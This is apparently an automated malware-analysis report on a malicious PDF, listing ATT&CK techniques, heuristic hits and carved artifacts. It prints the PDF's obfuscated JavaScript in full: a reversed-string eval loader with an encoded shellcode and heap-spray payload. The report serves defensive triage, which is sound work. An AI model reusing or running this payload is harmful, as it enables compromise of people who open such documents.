MALICIOUS
Risk Score: 68
Malware Insights
MITRE ATT&CK
- T1059.001 PowerShell
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The PDF document contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The ML classifier strongly flags this PDF as malicious. The embedded JavaScript file, 'javascript_obj0012_000.js', is likely responsible for executing the malicious payload. The presence of an embedded URL to 'http://www.bitstream.com' suggests a potential download or redirection vector.
Machine Learning
- Nyx PDF Classifier malicious score 0.9996
Heuristics (4)
- Suspicious extracted artifact (medium), EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- JavaScript action (low, 1 related finding), PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream (low), PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded URL (info), EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://www.bitstream.com (in PDF document text)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| javascript_obj0012_000.js | pdf-javascript-stream | PDF /JS object 12 at offset 0x104F0 | 2608 bytes | bb91fd30e1aaf48b0894565aa402ae6635580470fa25e980d566994a4d0072ae |
| font_00_sfnt_off00000319.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x319 | 65932 bytes | 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723 |

Detection for javascript_obj0012_000.js:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s).

Preview script (first 1,000 lines of the extracted script):

```javascript
var eva=new Function("a","ev al (a);".split(" ").join(""));
var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) )""(nioj.)" "(tilps."3e14u%b182u%a9fcu%b9a8u%2382u%806cu%055au%7e3cu%e26fu%6762u%2ba7u%a206u%7bf7u%dc87u%23ffu%3bafu%4cbbu%da8fu%c06eu%42d1u%d0e4u%ac65u%6c9eu%d864u%d466u%4e77u%244cu%2e76u%7397u%315eu%4531u%7c35u%e11fu%615fu%df51u%0b9cu%4afau%3e0au%062eu%7928u%fa36u%a136u%4975u%b9fau%bc33u%e2bdu%83f3u%afd3u%bdebu%9658u%6c41u%daf0u%df56u%014fu%5861u%fe18u%1409u%2e87u%e7f1u%a939u%d7c2u%b495u%58dau%e3a6u%9b2eu%9e96u%813du%14d2u%e4b2u%9e11u%c4bfu%c1b9u%92b3u%c13eu%5ec2u%f91cu%0486u%d2c2u%793eu%2cc7u%e4dfu%f8d7u%e623u%a5d9u%2982u%89bfu%a026u%7053u%c2b4u%eaf7u%3e42u%4190u%dac8u%4916u%5a8du%5adau%1bb8u%49f7u%73e6u%34c1u%4be8u%2505u%38c6u%3551u%5130u%1335u%4fb5u%4742u%339du%141bu%ea2bu%ab78u%ad3cu%139cu%0070u%f211u%0070u%137du%0070u%d451u%ff09u%ffffu%0070u%bb51u%0070u%227au%0070u%d451u%0909u%0909u%0070u%bb51u%0070u%227au%0070u%d451u%0909u%0909u%0070u%bb51u%0070u%227au%0070u%d451u%0909u%ff09u%0070u%bb51u%0070u%227au%0070u%d451u%ffffu%8e6eu%0070u%bb51u%0070u%227au%0070u%d451u%be50u%57eeu%0070u%bb51u%0070u%227au%0070u%d451u%c0c0u%c0c0u%0070u%bb51u%0070u%227au%0070u%d451u%18bfu%2c40u%0070u%bb51u%0070u%227au%0070u%d451u%4038u%380cu%0070u%bb51u%0070u%227au%0070u%d451u%9881u%b8a1u%0070u%bb51u%0070u%227au%0070u%d451u%5185u%a5beu%0070u%bb51u%0070u%227au%0070u%d451u%4509u%a509u%0070u%bb51u%0070u%137du%0000u%0400u%0000u%0001u%1000u%4010u%0000u%0000u%1000u%0010u%ffffu%ffffu%0070u%45c5u%0070u%2e25u%1000u%1100u%0070u%7f27u%0070u%ca8au%1000u%0010u%0070
u%bb51u%0070u%ca8au%1000u%1100u%0070u%bb51u%0070u%2bf7u%eff7u%0030u%0070u%bb51u%0070u%d451u%0000u%0001u%0070u%bb51u%1000u%4010u%0070u%7f27u%1000u%4210u%0070u%9951u%0070u%4809u%0070u%4809u%0070u%4809u%0070u%4809u%0070u%4809u%0070u%4809u%0070u%4809u%0070u%4809u%c0c0u%c0c0u%0070u%4809u%0070u%3309u%0070u%4809u%0070u%4809u%0070u%4809u%0070u%4809u%0070u%4809u%0070u%4809u%ccccu%ccccu%0070u%f651u%0070u%fe84u%ccccu%ccccu%0070u%9194u%c0c0u%c0c0u%" (epak = olygak rav ;epacsenu = epak rav ';
eva(s.split("").reverse().join(""));
```

Detection for font_00_sfnt_off00000319.bin:
- ClamAV: No threats found
- Obfuscation or payload: likely. Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)